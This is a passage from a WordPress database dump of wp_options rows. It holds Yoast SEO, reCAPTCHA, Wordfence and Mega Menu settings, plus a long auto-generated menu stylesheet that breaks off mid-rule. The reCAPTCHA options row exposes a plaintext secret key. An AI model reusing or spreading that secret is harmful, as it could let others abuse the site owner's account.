for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:14:\"person_logo_id\";i:0;s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:15:\"company_logo_id\";i:0;s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:20:\"title-bg_attribution\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:23:\"metadesc-bg_attribution\";s:0:\"\";s:22:\"noindex-bg_attribution\";b:0;s:23:\"showdate-bg_attribution\";b:0;s:33:\"display-metabox-pt-bg_attribution\";b:1;s:33:\"post_types-bg_attribution-maintax\";i:0;s:14:\"title-bg_block\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:17:\"metadesc-bg_block\";s:0:\"\";s:16:\"noindex-bg_block\";b:0;s:17:\"showdate-bg_block\";b:0;s:27:\"display-metabox-pt-bg_block\";b:1;s:27:\"post_types-bg_block-maintax\";i:0;s:17:\"title-tribe_venue\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:20:\"metadesc-tribe_venue\";s:0:\"\";s:19:\"noindex-tribe_venue\";b:0;s:20:\"showdate-tribe_venue\";b:0;s:30:\"display-metabox-pt-tribe_venue\";b:1;s:30:\"post_types-tribe_venue-maintax\";i:0;s:21:\"title-tribe_organizer\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tribe_organizer\";s:0:\"\";s:23:\"noindex-tribe_organizer\";b:0;s:24:\"showdate-tribe_organizer\";b:0;s:34:\"display-metabox-pt-tribe_organizer\";b:1;s:34:\"post_types-tribe_organizer-maintax\";i:0;s:18:\"title-tribe_events\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tribe_events\";s:0:\"\";s:20:\"noindex-tribe_events\";b:0;s:21:\"showdate-tribe_events\";b:0;s:31:\"display-metabox-pt-tribe_events\";b:1;s:31:\"post_types-tribe_events-maintax\";i:0;s:28:\"title-ptarchive-tribe_events\";s:51:\"%%pt_plural%% Archive %%page%% %%sep%% %%sitename%%\";s:31:\"metadesc-ptarchive-tribe_events\";s:0:\"\";s:30:\"bctitle-ptarchive-tribe_events\";s:0:\"\";s:30:\"noindex-ptarchive-tribe_events\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:23:\"title-tax-bg_block_type\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-tax-bg_block_type\";s:0:\"\";s:33:\"display-metabox-tax-bg_block_type\";b:1;s:25:\"noindex-tax-bg_block_type\";b:0;s:31:\"taxonomy-bg_block_type-ptparent\";i:0;s:26:\"title-tax-tribe_events_cat\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:29:\"metadesc-tax-tribe_events_cat\";s:0:\"\";s:36:\"display-metabox-tax-tribe_events_cat\";b:1;s:28:\"noindex-tax-tribe_events_cat\";b:0;s:34:\"taxonomy-tribe_events_cat-ptparent\";i:0;s:24:\"title-tax-media_category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:27:\"metadesc-tax-media_category\";s:0:\"\";s:34:\"display-metabox-tax-media_category\";b:1;s:26:\"noindex-tax-media_category\";b:0;s:32:\"taxonomy-media_category-ptparent\";i:0;}','yes'),(48486,'wpseo_social','a:19:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(48487,'wpseo_flush_rewrite','1','yes'),(48500,'wpseo_onpage','a:2:{s:6:\"status\";i:1;s:10:\"last_fetch\";i:1565309880;}','yes'),(48876,'mo_dismiss_adnotice','true','yes'),(48887,'anr_admin_options','a:16:{s:7:\"version\";s:3:\"5.5\";s:15:\"captcha_version\";s:11:\"v2_checkbox\";s:8:\"site_key\";s:40:\"6LcydLsSAAAAAKY_OLZyhAIbgioGmuQM-HlwndQg\";s:10:\"secret_key\";s:40:\"6LcydLsSAAAAAGzYaNvLp5G-LL4zhoFVu5EafYGG\";s:13:\"enabled_forms\";a:2:{i:0;s:0:\"\";i:1;s:5:\"login\";}s:13:\"error_message\";s:51:\"Ooops! The response is incorrect. Please try again!\";s:8:\"language\";s:0:\"\";s:5:\"theme\";s:5:\"light\";s:4:\"size\";s:6:\"normal\";s:5:\"badge\";s:11:\"bottomright\";s:18:\"failed_login_allow\";i:0;s:14:\"v3_script_load\";s:9:\"all_pages\";s:5:\"score\";s:3:\"0.5\";s:13:\"loggedin_hide\";s:0:\"\";s:10:\"remove_css\";s:0:\"\";s:5:\"no_js\";s:0:\"\";}','yes'),(48916,'sgr_login_check_disable','','yes'),(48934,'wordfence_version','7.10.7','yes'),(48935,'wordfence_case','1','yes'),(48936,'wordfence_installed','1','yes'),(48937,'wordfenceActivated','1','yes'),(48938,'wf_plugin_act_error','','yes'),(49952,'login_nocaptcha_working','1','yes'),(52020,'widget_maxmegamenu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(52021,'megamenu_version','2.7.1.4','yes'),(52022,'megamenu_initial_version','2.7.1.4','yes'),(52023,'megamenu_multisite_share_themes','false','yes'),(52024,'megamenu_settings','a:4:{s:6:\"prefix\";s:8:\"disabled\";s:12:\"descriptions\";s:7:\"enabled\";s:12:\"second_click\";s:2:\"go\";s:7:\"primary\";a:7:{s:7:\"enabled\";s:1:\"1\";s:5:\"event\";s:6:\"hover_\";s:6:\"effect\";s:7:\"fade_up\";s:12:\"effect_speed\";s:3:\"200\";s:13:\"effect_mobile\";s:8:\"disabled\";s:19:\"effect_speed_mobile\";s:3:\"200\";s:5:\"theme\";s:7:\"default\";}}','yes'),(52044,'_transient_timeout_megamenu_css','4719142988','no'),(52045,'_transient_megamenu_css','/** Sunday 11th August 2019 17:03:08 UTC (core) **/\n/** THIS FILE IS AUTOMATICALLY GENERATED - DO NOT MAKE MANUAL EDITS! **/\n/** Custom CSS should be added to Mega Menu > Menu Themes > Custom Styling **/\n\n.mega-menu-last-modified-1565542988 { content: \'Sunday 11th August 2019 17:03:08 UTC\'; }\n\n#mega-menu-wrap-primary, #mega-menu-wrap-primary #mega-menu-primary, #mega-menu-wrap-primary #mega-menu-primary ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-row, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-column, #mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link {\n  transition: none;\n  border-radius: 0;\n  box-shadow: none;\n  background: none;\n  border: 0;\n  bottom: auto;\n  box-sizing: border-box;\n  clip: auto;\n  color: #666;\n  display: block;\n  float: none;\n  font-family: inherit;\n  font-size: 14px;\n  height: auto;\n  left: auto;\n  line-height: 1.7;\n  list-style-type: none;\n  margin: 0;\n  min-height: auto;\n  max-height: none;\n  opacity: 1;\n  outline: none;\n  overflow: visible;\n  padding: 0;\n  position: relative;\n  pointer-events: auto;\n  right: auto;\n  text-align: left;\n  text-decoration: none;\n  text-indent: 0;\n  text-transform: none;\n  transform: none;\n  top: auto;\n  vertical-align: baseline;\n  visibility: inherit;\n  width: auto;\n  word-wrap: break-word;\n}\n#mega-menu-wrap-primary:before, #mega-menu-wrap-primary #mega-menu-primary:before, #mega-menu-wrap-primary #mega-menu-primary ul.mega-sub-menu:before, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item:before, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-row:before, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-column:before, #mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link:before, #mega-menu-wrap-primary:after, #mega-menu-wrap-primary #mega-menu-primary:after, #mega-menu-wrap-primary #mega-menu-primary ul.mega-sub-menu:after, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item:after, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-row:after, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-column:after, #mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link:after {\n  display: none;\n}\n#mega-menu-wrap-primary {\n  border-radius: 0;\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary {\n    background: #222;\n  }\n}\n#mega-menu-wrap-primary.mega-keyboard-navigation .mega-menu-toggle:focus, #mega-menu-wrap-primary.mega-keyboard-navigation .mega-toggle-block:focus, #mega-menu-wrap-primary.mega-keyboard-navigation .mega-toggle-block a:focus, #mega-menu-wrap-primary.mega-keyboard-navigation .mega-toggle-block .mega-search input[type=text]:focus, #mega-menu-wrap-primary.mega-keyboard-navigation .mega-toggle-block button.mega-toggle-animated:focus, #mega-menu-wrap-primary.mega-keyboard-navigation #mega-menu-primary a:focus, #mega-menu-wrap-primary.mega-keyboard-navigation #mega-menu-primary input:focus, #mega-menu-wrap-primary.mega-keyboard-navigation #mega-menu-primary li.mega-menu-item a.mega-menu-link:focus {\n  outline: 3px solid #109cde;\n  outline-offset: -3px;\n}\n#mega-menu-wrap-primary.mega-keyboard-navigation .mega-toggle-block button.mega-toggle-animated:focus {\n  outline-offset: 2px;\n}\n#mega-menu-wrap-primary.mega-keyboard-navigation > li.mega-menu-item > a.mega-menu-link:focus {\n  background: #333;\n  color: #fff;\n  font-weight: normal;\n  text-decoration: none;\n  border-color: #fff;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary.mega-keyboard-navigation > li.mega-menu-item > a.mega-menu-link:focus {\n    color: #fff;\n    background: #333;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary {\n  visibility: visible;\n  text-align: left;\n  padding: 0px 0px 0px 0px;\n}\n#mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link {\n  cursor: pointer;\n  display: inline;\n}\n#mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link .mega-description-group {\n  vertical-align: middle;\n  display: inline-block;\n  transition: none;\n}\n#mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link .mega-description-group .mega-menu-title, #mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link .mega-description-group .mega-menu-description {\n  transition: none;\n  line-height: 1.5;\n  display: block;\n}\n#mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link .mega-description-group .mega-menu-description {\n  font-style: italic;\n  font-size: 0.8em;\n  text-transform: none;\n  font-weight: normal;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu li.mega-menu-item.mega-icon-left.mega-has-description.mega-has-icon > a.mega-menu-link {\n  display: flex;\n  align-items: center;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu li.mega-menu-item.mega-icon-left.mega-has-description.mega-has-icon > a.mega-menu-link:before {\n  flex: 0 0 auto;\n  align-self: flex-start;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-tabbed.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item.mega-icon-left.mega-has-description.mega-has-icon > a.mega-menu-link {\n  display: block;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-icon-top > a.mega-menu-link {\n  display: table-cell;\n  vertical-align: middle;\n  line-height: initial;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-icon-top > a.mega-menu-link:before {\n  display: block;\n  margin: 0 0 6px 0;\n  text-align: center;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-icon-top > a.mega-menu-link > span.mega-title-below {\n  display: inline-block;\n  transition: none;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-icon-top > a.mega-menu-link {\n    display: block;\n    line-height: 40px;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-icon-top > a.mega-menu-link:before {\n    display: inline-block;\n    margin: 0 6px 0 0;\n    text-align: left;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-icon-right > a.mega-menu-link:before {\n  float: right;\n  margin: 0 0 0 6px;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-animating > ul.mega-sub-menu {\n  pointer-events: none;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-disable-link > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu li.mega-disable-link > a.mega-menu-link {\n  cursor: default;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children.mega-disable-link > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu li.mega-menu-item-has-children.mega-disable-link > a.mega-menu-link {\n  cursor: pointer;\n}\n#mega-menu-wrap-primary #mega-menu-primary p {\n  margin-bottom: 10px;\n}\n#mega-menu-wrap-primary #mega-menu-primary input, #mega-menu-wrap-primary #mega-menu-primary img {\n  max-width: 100%;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item > ul.mega-sub-menu {\n  display: block;\n  visibility: hidden;\n  opacity: 1;\n  pointer-events: auto;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item > ul.mega-sub-menu {\n    display: none;\n    visibility: visible;\n    opacity: 1;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-toggle-on > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu.mega-menu-item.mega-toggle-on ul.mega-sub-menu {\n    display: block;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu.mega-menu-item.mega-toggle-on li.mega-hide-sub-menu-on-mobile > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary li.mega-hide-sub-menu-on-mobile > ul.mega-sub-menu {\n    display: none;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade\"] li.mega-menu-item > ul.mega-sub-menu {\n    opacity: 0;\n    transition: opacity 200ms ease-in, visibility 200ms ease-in;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade\"].mega-no-js li.mega-menu-item:hover > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade\"].mega-no-js li.mega-menu-item:focus > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade\"] li.mega-menu-item.mega-toggle-on > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade\"] li.mega-menu-item.mega-menu-megamenu.mega-toggle-on ul.mega-sub-menu {\n    opacity: 1;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"] li.mega-menu-item.mega-menu-megamenu > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"] li.mega-menu-item.mega-menu-flyout ul.mega-sub-menu {\n    opacity: 0;\n    transform: translate(0, 10px);\n    transition: opacity 200ms ease-in, transform 200ms ease-in, visibility 200ms ease-in;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"].mega-no-js li.mega-menu-item:hover > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"].mega-no-js li.mega-menu-item:focus > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"] li.mega-menu-item.mega-toggle-on > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"fade_up\"] li.mega-menu-item.mega-menu-megamenu.mega-toggle-on ul.mega-sub-menu {\n    opacity: 1;\n    transform: translate(0, 0);\n  }\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"] li.mega-menu-item.mega-menu-megamenu > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"] li.mega-menu-item.mega-menu-flyout ul.mega-sub-menu {\n    transform: translate(0, 10px);\n    transition: transform 200ms ease-in, visibility 200ms ease-in;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"].mega-no-js li.mega-menu-item:hover > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"].mega-no-js li.mega-menu-item:focus > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"] li.mega-menu-item.mega-toggle-on > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary[data-effect=\"slide_up\"] li.mega-menu-item.mega-menu-megamenu.mega-toggle-on ul.mega-sub-menu {\n    transform: translate(0, 0);\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-collapse-children > ul.mega-sub-menu {\n  display: none;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-collapse-children.mega-toggle-on > ul.mega-sub-menu {\n  display: block;\n}\n#mega-menu-wrap-primary #mega-menu-primary.mega-no-js li.mega-menu-item:hover > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary.mega-no-js li.mega-menu-item:focus > ul.mega-sub-menu, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-toggle-on > ul.mega-sub-menu {\n  visibility: visible;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu ul.mega-sub-menu {\n  visibility: inherit;\n  opacity: 1;\n  display: block;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-1-columns > ul.mega-sub-menu > li.mega-menu-item {\n  float: left;\n  width: 100%;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-2-columns > ul.mega-sub-menu > li.mega-menu-item {\n  float: left;\n  width: 50%;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-3-columns > ul.mega-sub-menu > li.mega-menu-item {\n  float: left;\n  width: 33.33333%;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-menu-megamenu ul.mega-sub-menu li.mega-4-columns > ul.mega-sub-menu > li.mega-menu-item {\n  float: left;\n  width: 25%;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item a[class^=\'dashicons\']:before {\n  font-family: dashicons;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item a.mega-menu-link:before {\n  display: inline-block;\n  font: inherit;\n  font-family: dashicons;\n  position: static;\n  margin: 0 6px 0 0px;\n  vertical-align: top;\n  -webkit-font-smoothing: antialiased;\n  -moz-osx-font-smoothing: grayscale;\n  color: inherit;\n  background: transparent;\n  height: auto;\n  width: auto;\n  top: auto;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-hide-text a.mega-menu-link:before {\n  margin: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item.mega-hide-text li.mega-menu-item a.mega-menu-link:before {\n  margin: 0 6px 0 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-align-bottom-left.mega-toggle-on > a.mega-menu-link {\n  border-radius: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-align-bottom-right > ul.mega-sub-menu {\n  right: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-align-bottom-right.mega-toggle-on > a.mega-menu-link {\n  border-radius: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-menu-item {\n  position: static;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item {\n  margin: 0 0px 0 0;\n  display: inline-block;\n  height: auto;\n  vertical-align: middle;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-item-align-right {\n  float: right;\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-item-align-right {\n    margin: 0 0 0 0px;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-item-align-float-left {\n    float: left;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item > a.mega-menu-link:hover {\n    background: #333;\n    color: #fff;\n    font-weight: normal;\n    text-decoration: none;\n    border-color: #fff;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-toggle-on > a.mega-menu-link {\n  background: #333;\n  color: #fff;\n  font-weight: normal;\n  text-decoration: none;\n  border-color: #fff;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-toggle-on > a.mega-menu-link {\n    color: #fff;\n    background: #333;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-menu-item > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-menu-ancestor > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-page-ancestor > a.mega-menu-link {\n  background: #333;\n  color: #fff;\n  font-weight: normal;\n  text-decoration: none;\n  border-color: #fff;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-menu-item > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-menu-ancestor > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-current-page-ancestor > a.mega-menu-link {\n    color: #fff;\n    background: #333;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item > a.mega-menu-link {\n  line-height: 40px;\n  height: 40px;\n  padding: 0px 10px 0px 10px;\n  vertical-align: baseline;\n  width: auto;\n  display: block;\n  color: #fff;\n  text-transform: none;\n  text-decoration: none;\n  text-align: left;\n  text-decoration: none;\n  background: rgba(0, 0, 0, 0);\n  border: 0;\n  border-radius: 0;\n  font-family: inherit;\n  font-size: 14px;\n  font-weight: normal;\n  outline: none;\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-multi-line > a.mega-menu-link {\n    line-height: inherit;\n    display: table-cell;\n    vertical-align: middle;\n  }\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-multi-line > a.mega-menu-link br {\n    display: none;\n  }\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item {\n    display: list-item;\n    margin: 0;\n    clear: both;\n    border: 0;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item.mega-item-align-right {\n    float: none;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-item > a.mega-menu-link {\n    border-radius: 0;\n    border: 0;\n    margin: 0;\n    line-height: 40px;\n    height: 40px;\n    padding: 0 10px;\n    background: transparent;\n    text-align: left;\n    color: #fff;\n    font-size: 14px;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row {\n  width: 100%;\n  float: left;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row .mega-menu-column {\n  float: left;\n  min-height: 1px;\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-1 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-2 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-2 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-3 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-3 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-3 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-4 {\n    width: 25%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-4 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-4 {\n    width: 75%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-4 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-5 {\n    width: 20%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-5 {\n    width: 40%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-5 {\n    width: 60%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-5 {\n    width: 80%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-5 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-6 {\n    width: 16.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-6 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-6 